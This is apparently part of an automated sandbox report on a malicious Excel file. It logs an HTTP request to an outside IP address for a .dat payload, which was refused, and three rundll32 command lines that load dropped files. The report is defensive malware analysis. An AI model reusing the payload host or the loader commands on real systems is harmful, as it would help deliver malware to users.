                TimestampkBytes transferredDirectionData
                May 14, 2021 18:20:50.280206919 CEST3OUTGET /44330.7644571759.dat HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: 194.156.98.173
                Connection: Keep-Alive
                May 14, 2021 18:20:52.224764109 CEST4INHTTP/1.1 403 Forbidden
                Server: nginx
                Date: Fri, 14 May 2021 16:20:52 GMT
                Content-Type: text/html
                Content-Length: 548
                Connection: keep-alive
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                Code Manipulations

                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                Behavior

                Click to jump to process

                System Behavior

                General

                Start time:18:20:43
                Start date:14/05/2021
                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                Wow64 process (32bit):false
                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Imagebase:0x13f130000
                File size:27641504 bytes
                MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:18:20:55
                Start date:14/05/2021
                Path:C:\Windows\System32\rundll32.exe
                Wow64 process (32bit):false
                Commandline:rundll32 ..\lertio.cersw,DllRegisterServer
                Imagebase:0xffd20000
                File size:45568 bytes
                MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:18:20:55
                Start date:14/05/2021
                Path:C:\Windows\System32\rundll32.exe
                Wow64 process (32bit):false
                Commandline:rundll32 ..\lertio.cersw1,DllRegisterServer
                Imagebase:0xffd20000
                File size:45568 bytes
                MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:18:20:55
                Start date:14/05/2021
                Path:C:\Windows\System32\rundll32.exe
                Wow64 process (32bit):false
                Commandline:rundll32 ..\lertio.cersw2,DllRegisterServer
                Imagebase:0xffd20000
                File size:45568 bytes
                MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Disassembly

                Code Analysis

                Reset < >